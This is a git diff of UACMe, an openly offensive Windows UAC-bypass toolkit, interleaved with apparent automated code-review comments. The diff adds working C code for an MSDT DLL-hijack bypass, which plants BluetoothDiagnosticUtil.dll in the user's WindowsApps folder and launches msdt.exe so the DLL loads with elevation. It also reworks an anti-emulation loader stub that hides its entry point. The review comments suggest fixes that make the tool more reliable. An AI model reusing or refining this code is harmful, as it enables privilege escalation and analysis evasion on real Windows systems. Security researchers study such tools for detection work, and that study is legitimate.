diff --git a/LICENSE.md b/LICENSE.md
index 2d5e513..6fcf3e7 100644
--- a/LICENSE.md
+++ b/LICENSE.md
@@ -1,4 +1,4 @@
-Copyright (c) 2014 - 2021, UACMe authors
+Copyright (c) 2014 - 2022, UACMe authors
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
diff --git a/README.md b/README.md
index 946f722..61850e1 100644
--- a/README.md
+++ b/README.md
@@ -733,6 +733,16 @@ First parameter is number of method to use, second is optional command (executab
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.5.8
+72. Author: Emeric Nasi
+ * Type: Dll Hijack
+ * Method: Dll path search abuse
+ * Target(s): \syswow64\msdt.exe, \system32\sdiagnhost.exe
+ * Component(s): BluetoothDiagnosticUtil.dll
+ * Implementation: ucmMsdtMethod
+ * Works from: Windows 10 (10240)
+ * Fixed in: unfixed :see_no_evil:
+ * How: -
+ * Code status: added in v3.5.9
@@ -835,9 +845,10 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
* UACMe 3.5, WD and the ways of mitigation, https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html
* UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html
* Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses
+* MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
# Authors
-(c) 2014 - 2021 UACMe Project
+(c) 2014 - 2022 UACMe Project
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fhfiref0x%2FUACME&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com)
diff --git a/Source/Akagi/bin64res.h b/Source/Akagi/bin64res.h
index 6e7736b..32483e9 100644
Binary files a/Source/Akagi/bin64res.h and b/Source/Akagi/bin64res.h differ
diff --git a/Source/Akagi/bin64res.rc b/Source/Akagi/bin64res.rc
index 0590085..c2deb14 100644
--- a/Source/Akagi/bin64res.rc
+++ b/Source/Akagi/bin64res.rc
@@ -2,6 +2,7 @@
#include "winres.h"
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
IDR_FUBUKI64 RCDATA "bin\\fubuki64.cd"
+IDR_FUBUKI32 RCDATA "bin\\fubuki32.cd"
IDR_AKATSUKI64 RCDATA "bin\\akatsuki64.cd"
IDR_KAMIKAZE RCDATA "bin\\kamikaze.cd"
IDR_SECRETS RCDATA "bin\\secrets64.bin"
diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h
index 2c57dac..281662f 100644
--- a/Source/Akagi/global.h
+++ b/Source/Akagi/global.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2021
+* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: GLOBAL.H
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 01 Dec 2021
+* DATE: 04 Feb 2022
*
* Common header file for the program support routines.
*
@@ -45,11 +45,13 @@
#include "bin64res.h"
#define FUBUKI_ID IDR_FUBUKI64
#define AKATSUKI_ID IDR_AKATSUKI64
+#define FUBUKI32_ID IDR_FUBUKI32
#define KAMIKAZE_ID IDR_KAMIKAZE
#else
#include "bin32res.h"
#define FUBUKI_ID IDR_FUBUKI32
#define AKATSUKI_ID PAYLOAD_ID_NONE //this module unavailable for 32 bit
+#define FUBUKI32_ID IDR_FUBUKI32
#define KAMIKAZE_ID IDR_KAMIKAZE
#endif
@@ -149,5 +151,13 @@ typedef UINT(WINAPI *pfnEntryPoint)(
_In_ BOOL OutputToDebugger
);
+typedef struct _UACME_THREAD_CONTEXT {
+ TEB_ACTIVE_FRAME Frame;
+ pfnEntryPoint ucmMain;
+ DWORD ReturnedResult;
+ ULONG OptionalParameterLength;
+ LPWSTR OptionalParameter;
+} UACME_THREAD_CONTEXT, * PUACME_THREAD_CONTEXT;
+
extern PUACMECONTEXT g_ctx;
extern HINSTANCE g_hInstance;
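Review bot: `UACME_THREAD_CONTEXT` has an undocumented layout requirement. stub.c in this same commit casts the struct to and from `PTEB_ACTIVE_FRAME` for `RtlPushFrame`/`RtlGetFrame`, which only works while `Frame` is the first member. I would add a comment above the typedef, e.g. `/* Frame must remain the first member: the struct is pushed and walked as a TEB_ACTIVE_FRAME. */`. `OptionalParameterLength` and `OptionalParameter` are not read or written anywhere in the visible changes; if they are reserved for later use, a one-line comment saying so would help.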
diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c
index 417d54a..0678c19 100644
--- a/Source/Akagi/main.c
+++ b/Source/Akagi/main.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2021
+* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: MAIN.C
*
-* VERSION: 3.57
+* VERSION: 3.59
*
-* DATE: 01 Nov 2021
+* DATE: 02 Feb 2022
*
* Program entry point.
*
@@ -217,10 +217,5 @@ NTSTATUS WINAPI ucmMain(
#pragma comment(linker, "/ENTRY:main")
VOID __cdecl main()
{
-#ifdef _WIN64
- __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain);
-#else
- __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain);
-#endif
- ExitProcess(StubInit());
+ ExitProcess(StubInit(ucmMain));
}
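Review bot: `ucmMain` is passed to `StubInit` as a bare `PVOID`, so the compiler can no longer check its signature against the `pfnEntryPoint` type it is later called through in stub.c. The hunk header shows `NTSTATUS WINAPI ucmMain(` while global.h declares `typedef UINT(WINAPI *pfnEntryPoint)(`, so the call goes through a function pointer type whose return type differs from the definition. That is presumably harmless on this ABI, but the two are not compatible function types in C. Declaring the parameter as `DWORD StubInit(_In_ pfnEntryPoint EntryPoint);` in stub.h and stub.c, and aligning the return type of `ucmMain` with the typedef, would restore the check.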
diff --git a/Source/Akagi/methods/hybrids.c b/Source/Akagi/methods/hybrids.c
index 3908f44..86d924d 100644
--- a/Source/Akagi/methods/hybrids.c
+++ b/Source/Akagi/methods/hybrids.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2015 - 2021
+* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: HYBRIDS.C
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 01 Dec 2021
+* DATE: 02 Feb 2022
*
* Hybrid UAC bypass methods.
*
@@ -1045,3 +1045,96 @@ NTSTATUS ucmJunctionMethod(
return MethodResult;
}
+
+/*
+* ucmMsdtMethod
+*
+* Purpose:
+*
+* Bypass UAC by dll hijack of sdiagnhost.
+* https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass
+*
+*/
+NTSTATUS ucmMsdtMethod(
+ _In_ PVOID ProxyDll,
+ _In_ DWORD ProxyDllSize
+)
+{
+ BOOLEAN bCleanupNeeded = FALSE;
+ UINT i;
+ NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
+#ifndef _WIN64
+ NTSTATUS ntStatus = STATUS_ACCESS_DENIED;
+#endif
+ WCHAR szPath[MAX_PATH * 2];
+ WCHAR szApp[MAX_PATH + 1];
+ WCHAR szParams[MAX_PATH * 2];
+
+#ifndef _WIN64
+ if (g_ctx->IsWow64) {
+ ntStatus = supEnableDisableWow64Redirection(TRUE);
+ if (!NT_SUCCESS(ntStatus))
+ return ntStatus;
+ }
+#endif
+
+ do {
+
+ RtlSecureZeroMemory(&szPath, sizeof(szPath));
+ if (!SHGetSpecialFolderPath(NULL, (LPWSTR)&szPath, CSIDL_LOCAL_APPDATA, FALSE))
+ break;
+
+ supConcatenatePaths(szPath, TEXT("Microsoft\\WindowsApps"), MAX_PATH);
+ supConcatenatePaths(szPath, BLUETOOTHDIAGNOSTICUTIL_DLL, MAX_PATH);
+
+ if (!supWriteBufferToFile(szPath, ProxyDll, ProxyDllSize))
+ break;
+
+ bCleanupNeeded = TRUE;
+
+ _strcpy(szApp, g_ctx->szSystemRoot);
+ supConcatenatePaths(szApp, SYSWOW64_DIR, MAX_PATH);
+ supConcatenatePaths(szApp, MSDT_EXE, MAX_PATH);
+
+ _strcpy(szParams, TEXT("-path "));
+ _strcat(szParams, g_ctx->szSystemRoot);
+ _strcat(szParams, TEXT("diagnostics\\index\\BluetoothDiagnostic.xml -skip yes"));
+
+ if (supRunProcess2(szApp,
+ szParams,
+ NULL,
+ SW_HIDE,
+ 10000))
+ {
+ MethodResult = STATUS_SUCCESS;
+ }
+
+ } while (FALSE);
+
+
+ if (bCleanupNeeded) {
+ i = 5;
+ do {
+
+ if (DeleteFile(szPath))
+ break;
+
+ Sleep(1000);
+ i--;
+ } while (i);
+
+ }
+
+
+#ifndef _WIN64
+ if (g_ctx->IsWow64) {
+ supEnableDisableWow64Redirection(FALSE);
+ }
+#endif
+
+#ifdef _DEBUG
+ supSetGlobalCompletionEvent();
+#endif
+
+ return MethodResult;
+}
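Review bot: When all five `DeleteFile(szPath)` attempts in the cleanup loop fail, the written copy of `BLUETOOTHDIAGNOSTICUTIL_DLL` stays under `Microsoft\WindowsApps` in the user's local application data. The function still returns `MethodResult` unchanged, so nothing records that a file was left behind. The header comment names only the technique; it should also state what the routine leaves on the system so that test runs can be audited and reverted: the file path it writes, the `msdt.exe` command line it starts (`-path` pointing at `diagnostics\index\BluetoothDiagnostic.xml` with `-skip yes`), and that the file may persist if deletion fails. Separately, `_strcpy(szApp, g_ctx->szSystemRoot)` and the `_strcat` calls into `szParams` are unbounded; `szSystemRoot` is declared outside this hunk, so confirm it cannot exceed `MAX_PATH` characters.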
diff --git a/Source/Akagi/methods/hybrids.h b/Source/Akagi/methods/hybrids.h
index 98358ba..a7c3fd3 100644
--- a/Source/Akagi/methods/hybrids.h
+++ b/Source/Akagi/methods/hybrids.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2015 - 2021
+* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: HYBRIDS.H
*
-* VERSION: 3.57
+* VERSION: 3.59
*
-* DATE: 01 Nov 2020
+* DATE: 02 Feb 2022
*
* Prototypes and definitions for hybrid methods.
*
@@ -53,6 +53,10 @@ NTSTATUS ucmJunctionMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
+NTSTATUS ucmMsdtMethod(
+ _In_ PVOID ProxyDll,
+ _In_ DWORD ProxyDllSize);
+
//
// Post execution cleanup routines.
//
diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c
index 7979268..bd32d50 100644
--- a/Source/Akagi/methods/methods.c
+++ b/Source/Akagi/methods/methods.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2015 - 2021
+* (C) COPYRIGHT AUTHORS, 2015 - 2022
*
* TITLE: METHODS.C
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 01 Dec 2021
+* DATE: 04 Feb 2022
*
* UAC bypass dispatch.
*
@@ -45,6 +45,7 @@ UCM_API(MethodFwCplLua2);
UCM_API(MethodProtocolHijack);
UCM_API(MethodPca);
UCM_API(MethodCurVer);
+UCM_API(MethodMsdt);
ULONG UCM_WIN32_NOT_IMPLEMENTED[] = {
UacMethodWow64Logger,
@@ -131,7 +132,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodProtocolHijack, { NT_WIN10_REDSTONE5, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
- { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
+ { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
+ { MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE }
};
/*
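Review bot: The new row `{ MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE }` carries three positional booleans whose meaning cannot be read from the table. Its middle flag differs from the neighbouring payload-based rows (`FALSE, TRUE, TRUE`). A comment naming the three fields, on this row or once above the table, would let a reader confirm the difference is intended. The table appears to be ordered to match `UCM_METHOD`; its declaration and the entry struct lie outside this hunk, so whether that ordering is checked anywhere cannot be seen here.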
@@ -746,3 +748,10 @@ UCM_API(MethodCurVer)
#endif
}
+
+UCM_API(MethodMsdt)
+{
+ return ucmMsdtMethod(
+ Parameter->PayloadCode,
+ Parameter->PayloadSize);
+}
diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h
index 785d052..5dd16e5 100644
--- a/Source/Akagi/methods/methods.h
+++ b/Source/Akagi/methods/methods.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2021
+* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: METHODS.H
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 21 Nov 2021
+* DATE: 04 Feb 2022
*
* Prototypes and definitions for UAC bypass methods table.
*
@@ -91,6 +91,7 @@ typedef enum _UCM_METHOD {
UacMethodPca, //+
UacMethodCurVer, //+
UacMethodNICPoison2, //+
+ UacMethodMsdt, //+
UacMethodMax,
UacMethodInvalid = 0xabcdef
} UCM_METHOD;
diff --git a/Source/Akagi/stub.c b/Source/Akagi/stub.c
index 5aa9fca..3d757a4 100644
--- a/Source/Akagi/stub.c
+++ b/Source/Akagi/stub.c
@@ -1,12 +1,12 @@
-/*******************************************************************************
+/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2022
*
* TITLE: STUB.C
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 28 Jan 2022
+* DATE: 02 Feb 2022
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -16,7 +16,7 @@
*******************************************************************************/
#include "global.h"
-UINT ucmExitCode = (UINT)STATUS_ACCESS_DENIED;
+TEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, "(^/\\^)" };
/*
* ucmSehHandler
@@ -31,66 +31,59 @@ INT ucmSehHandler(
_In_ EXCEPTION_POINTERS* ExceptionInfo
)
{
- DWORD_PTR entry;
- NTSTATUS result = wdIsEmulatorPresent();
+ UACME_THREAD_CONTEXT* uctx;
UNREFERENCED_PARAMETER(ExceptionInfo);
if (ExceptionCode == STATUS_INTEGER_DIVIDE_BY_ZERO) {
+ uctx = (UACME_THREAD_CONTEXT*)RtlGetFrame();
+ while ((uctx != NULL) && (uctx->Frame.Context != &g_fctx)) {
+ uctx = (UACME_THREAD_CONTEXT*)uctx->Frame.Previous;
+ }
+ if (uctx) {
+ if (uctx->ucmMain) {
+ uctx->ucmMain = (pfnEntryPoint)supDecodePointer(uctx->ucmMain);
-#ifdef _WIN64
- entry = (DWORD_PTR)__readgsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer));
- __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), 0);
- entry = (RotateRight64(
- (ULONG_PTR)(ULONG_PTR)entry,
- 0x40 - (result & 0x3f)) ^ result);
-#else
- entry = (DWORD_PTR)__readfsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer));
- __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), 0);
- entry = (RotateRight32(
- (ULONG_PTR)entry,
- 0x20 - (result & 0x1f)) ^ result);
-#endif
-
- ucmExitCode = ((pfnEntryPoint)(entry))(UacMethodInvalid,
- NULL,
- 0,
- FALSE);
-
+ uctx->ReturnedResult = uctx->ucmMain(UacMethodInvalid,
+ NULL,
+ 0,
+ FALSE);
+ }
+ }
return EXCEPTION_EXECUTE_HANDLER;
}
return EXCEPTION_CONTINUE_SEARCH;
}
-DWORD StubInit(VOID)
+DWORD StubInit(
+ _In_ PVOID EntryPoint)
{
int v = 1, d = 0;
- DWORD_PTR entry;
- NTSTATUS ntStatus = STATUS_NOT_SUPPORTED;
+ UACME_THREAD_CONTEXT uctx;
- __try {
+ RtlSecureZeroMemory(&uctx, sizeof(uctx));
-#ifdef _WIN64
- entry = (DWORD_PTR)__readgsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer));
- entry = (RotateRight64(
- (ULONG_PTR)entry ^ ntStatus,
- ntStatus & 0x3f));
- __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), entry);
-#else
- entry = (DWORD_PTR)__readfsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer));
- entry = (RotateRight32(
- (ULONG_PTR)entry ^ ntStatus,
- ntStatus & 0x1f));
- __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), entry);
-#endif
+ if (wdIsEmulatorPresent() == STATUS_NOT_SUPPORTED) {
- v = (int)USER_SHARED_DATA->NtProductType;
- d = (int)USER_SHARED_DATA->AlternativeArchitecture;
- v = (int)(v / d);
- }
- __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) {
- v = ucmExitCode;
+ uctx.Frame.Context = &g_fctx;
+
+ uctx.ucmMain = (pfnEntryPoint)supEncodePointer(EntryPoint);
+ RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);
+
+ __try {
+ v = (int)USER_SHARED_DATA->NtProductType;
+ d = (int)USER_SHARED_DATA->AlternativeArchitecture;
+ v = (int)(v / d);
+ }
+ __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) {
+ v = 1;
+ }
+
+ RtlPopFrame((PTEB_ACTIVE_FRAME)&uctx);
}
- return ucmExitCode;
+ if (v)
+ return uctx.ReturnedResult;
+ else
+ return (DWORD)STATUS_ACCESS_DENIED;
}
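Review bot: `StubInit` now returns 0 when the `wdIsEmulatorPresent() == STATUS_NOT_SUPPORTED` branch is not taken. `uctx` is zeroed, `v` keeps its initial value 1, and `return uctx.ReturnedResult;` yields 0, which reads as success although the entry point never ran. The removed code started from `ucmExitCode = (UINT)STATUS_ACCESS_DENIED`, so that default was lost in the rewrite. Setting `uctx.ReturnedResult = (DWORD)STATUS_ACCESS_DENIED;` right after the `RtlSecureZeroMemory` call restores it. The same default also covers the paths in `ucmSehHandler` where no matching frame is found or `uctx->ucmMain` is NULL, which otherwise return `EXCEPTION_EXECUTE_HANDLER` with the result still 0.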
diff --git a/Source/Akagi/stub.h b/Source/Akagi/stub.h
index e0d0b81..5978aea 100644
--- a/Source/Akagi/stub.h
+++ b/Source/Akagi/stub.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2021
+* (C) COPYRIGHT AUTHORS, 2018 - 2022
*
* TITLE: STUB.H
*
-* VERSION: 3.57
+* VERSION: 3.59
*
-* DATE: 01 Nov 2021
+* DATE: 02 Feb 2022
*
* Kuma stub header file
*
@@ -18,4 +18,4 @@
*******************************************************************************/
#pragma once
-DWORD StubInit(VOID);
+DWORD StubInit(_In_ PVOID EntryPoint);
diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj
index f3ad5b2..70e1217 100644
--- a/Source/Akagi/uacme.vcxproj
+++ b/Source/Akagi/uacme.vcxproj
@@ -362,7 +362,6 @@
Windows
- false
true
true
@@ -372,6 +371,7 @@
6.1
+ false
diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user
index 067c18d..4fdce08 100644
--- a/Source/Akagi/uacme.vcxproj.user
+++ b/Source/Akagi/uacme.vcxproj.user
@@ -16,7 +16,7 @@
WindowsLocalDebugger
- 71
+ 72
WindowsLocalDebugger
@@ -24,7 +24,8 @@
WindowsLocalDebugger
- 32
+
+
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Akatsuki/version.rc b/Source/Akatsuki/version.rc
index ee02fd4..e47a7a8 100644
Binary files a/Source/Akatsuki/version.rc and b/Source/Akatsuki/version.rc differ
diff --git a/Source/Fubuki/version.rc b/Source/Fubuki/version.rc
index 13e8ef3..16336e8 100644
Binary files a/Source/Fubuki/version.rc and b/Source/Fubuki/version.rc differ
diff --git a/Source/Naka/main.c b/Source/Naka/main.c
index 8f0105d..a6bc6bb 100644
--- a/Source/Naka/main.c
+++ b/Source/Naka/main.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2016 - 2020
+* (C) COPYRIGHT AUTHORS, 2016 - 2022
*
* TITLE: MAIN.C
*
-* VERSION: 3.50
+* VERSION: 3.59
*
-* DATE: 14 Sep 2020
+* DATE: 02 Feb 2022
*
* Naka, support payload compressor.
*
@@ -1121,6 +1121,11 @@ VOID CreateSecretTables(VOID)
if (ProcessUnit(szFileName, IDR_FUBUKI64, &S[c]))
c++;
+ szFileName[l] = 0;
+ _strcat(&szFileName[l], L"Fubuki32.key");
+ if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c]))
+ c++;
+
szFileName[l] = 0;
_strcat(&szFileName[l], L"Kamikaze.key");
if (ProcessUnit(szFileName, IDR_KAMIKAZE64, &S[c]))
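Review bot: The added `ProcessUnit(szFileName, IDR_FUBUKI32, &S[c])` call can advance `c` one slot further than before, and the declaration of `S` is outside this hunk. Please confirm the array in `CreateSecretTables` was sized for the extra unit. If it is a fixed-size array, a guard such as `if (c < RTL_NUMBER_OF(S))` before each `&S[c]` would make the limit explicit. The `_strcat` of `L"Fubuki32.key"` at `&szFileName[l]` likewise relies on the remaining capacity of `szFileName`, which is not visible here.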
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index d08856d..ba31eed 100644
--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 3.58
+* VERSION: 3.59
*
-* DATE: 28 Jan 2022
+* DATE: 04 Feb 2022
*
* Global consts definition file.
*
@@ -47,8 +47,8 @@
#define UCM_VERSION_MAJOR 3
#define UCM_VERSION_MINOR 5
-#define UCM_VERSION_REVISION 8
-#define UCM_VERSION_BUILD 2201
+#define UCM_VERSION_REVISION 9
+#define UCM_VERSION_BUILD 2202
#define SUPRUNPROCESS_TIMEOUT_DEFAULT 12000
@@ -147,6 +147,7 @@
//
#define APISET_KERNEL32LEGACY L"api-ms-win-core-kernel32-legacy-l1.DLL"
+#define BLUETOOTHDIAGNOSTICUTIL_DLL L"BluetoothDiagnosticUtil.dll"
#define COMCTL32_DLL L"comctl32.dll"
#define DISMCORE_DLL L"dismcore.dll"
#define DUSER_DLL L"duser.dll"
@@ -180,6 +181,7 @@
#define MMC_EXE L"mmc.exe"
#define MSCONFIG_EXE L"msconfig.exe"
#define MSCHEDEXE_EXE L"mschedexe.exe"
+#define MSDT_EXE L"msdt.exe"
#define OSK_EXE L"osk.exe"
#define PKGMGR_EXE L"pkgmgr.exe"
#define SDCLT_EXE L"sdclt.exe"
diff --git a/UACME.sha256 b/UACME.sha256
index afa9054..a83f894 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -7,26 +7,26 @@ b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397 *Source\Akagi\a
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25 *Source\Akagi\bin32res.h
3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c *Source\Akagi\bin32res.rc
-8977786129c9d6d526fb2e41fb3a3ab25566ee53b60db658a41f75d6f58f4e90 *Source\Akagi\bin64res.h
-f7e3861fc30e750c9a65fc338a9ad72a8d7a31ee949aef37cfe98a15b60a9ba2 *Source\Akagi\bin64res.rc
+e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a *Source\Akagi\bin64res.h
+5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a *Source\Akagi\bin64res.rc
bc0e6067d038a528fdfc90793b199ae73f211da7df33341bfd7bcfce2c163eb7 *Source\Akagi\compress.c
5a46c82638d48aaea2edfed0e8c50981dd606be8e3c171f8608f51bc777305cf *Source\Akagi\compress.h
d3b0fdac91acd95076de2a1d037c05692712e92ef8f77fd1f8a1db1579ee2923 *Source\Akagi\encresource.h
f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788 *Source\Akagi\fusutil.c
eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b *Source\Akagi\fusutil.h
-d1acbe26c56a6c0b8db84dad2506dd50e84a8842b4f002b81ff9114d9531e8ba *Source\Akagi\global.h
-3a00394eb92d3bcbadad8a6313cd6d3ad5061901e80391450efcfe5e9bf8dc1e *Source\Akagi\main.c
+e0e97bec016ef156dad00c4986ed620584663a68823e9e8656239d595b915585 *Source\Akagi\global.h
+06c1b9b39448d4fd789856f51742c9346917080ca86a2f9b110c30c22d108c4b *Source\Akagi\main.c
9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58 *Source\Akagi\makecab.c
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
10a31b41ae931835100b1a7537be6fdaec2a306b71110fa9656f9bf5f4a6a76b *Source\Akagi\Resource.rc
-002992a366199b4bb180850bede26fd8602be8b36d37d93da6e3778460345fef *Source\Akagi\stub.c
-d951a09c7011fa1aa3854ea713836c9cd63aa88ac9f64f013d2f24f9fcaa9b38 *Source\Akagi\stub.h
+a808ad08347f68f18ddc75eed8e284e8479da7970af5b17a169fa972b8512d9a *Source\Akagi\stub.c
+b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06 *Source\Akagi\stub.h
273c6105759779913664cd813232a69382562ff1818756cc689a45b1fd11a902 *Source\Akagi\sup.c
912447a3eb73b10278c965fd9273b4eb75902c41681e76e9a547b57af1e1617a *Source\Akagi\sup.h
-f245bd85599293b3c6bc294a01f160393e28703e98dc772ebd8b13d189897055 *Source\Akagi\uacme.vcxproj
+ee447f9ad4b2cccb615f8d530048a349243afdafbe9314637115cdd60b1684bd *Source\Akagi\uacme.vcxproj
15a18a8f06b4ce02de316a0b4a6b7a3cb41d6353711d3e2429164622c47e44ab *Source\Akagi\uacme.vcxproj.filters
-3779b8e127c260dd6f7bd4b84665465b3e09af811f8c90d6eef10a07d4395de3 *Source\Akagi\uacme.vcxproj.user
+f04df8b72d7d5fe30795e4cac6ec1268d1f955150303e366a91ac8f7ba6135be *Source\Akagi\uacme.vcxproj.user
fd2bf3f4369850efc4c408133ddf253ced6f0b400b13997060c50a2f9b6cc9d0 *Source\Akagi\uas.h
750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6 *Source\Akagi\appinfo\appinfo.acf
2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5 *Source\Akagi\appinfo\appinfo.idl
@@ -51,10 +51,10 @@ e7654ba3099afcc9183d3d092e9cbe19ea06faddbbfb554891eeece174d81b8e *Source\Akagi\m
cf5152c786b5e72514038a256e0372c176ac20ca49653bbf80a0862963bf3c20 *Source\Akagi\methods\elvint.h
8453310f284faee89d5b5e575d1521dd6dd7983bc9cd67e204a51676d9511916 *Source\Akagi\methods\hakril.c
e72fce9d89c7ac424e90635dc984a943890c8422c2a6869c49c3a29accde6521 *Source\Akagi\methods\hakril.h
-49e14cdf2c470d50272980c46f15ef7b3ffad41e78de8d6f9cf9c3ee3db09b47 *Source\Akagi\methods\hybrids.c
-90aa9cbbbbe621a7215083fbfcd52bfc64df261a6dc795fb719a21a61db0fc9a *Source\Akagi\methods\hybrids.h
-1b793c9da6cf4755070ff6bec59bd1affc5e07d87b968ba211cb14b12916c9c4 *Source\Akagi\methods\methods.c
-ad157a213ace932adaf09559f91c600588c25a86801d7f1dda04f5973ed6b45d *Source\Akagi\methods\methods.h
+1edcbc82ed2f214b03f22305736179b6777a9bab755138b52ab5ae6e9dbf7b0a *Source\Akagi\methods\hybrids.c
+112da2d5701041e58b1b01a8d5a42854200b171ec8c8b4712f957f63877e16b6 *Source\Akagi\methods\hybrids.h
+a3d618693fc6780e5c1e8d04f3f8e8edb7d64ea77f635e20dbaff64118859585 *Source\Akagi\methods\methods.c
+9302023437c9a80e2d8910f6e9ffa24ece680278653ebef6247acfc1e21e64a6 *Source\Akagi\methods\methods.h
f220dbc1bb1e525e3adb76f0d1e9ac3237851bcbb55e7fd350288ef492116756 *Source\Akagi\methods\rinn.c
244cba3a74291e324964cfb40c153a00426b0e1f2fcb3f02ac7063e9915e52d8 *Source\Akagi\methods\rinn.h
c204e44cffb51d95128971ec8b31e668e3b4f50ba3f4082c36ced76c2b30bc63 *Source\Akagi\methods\shellsup.c
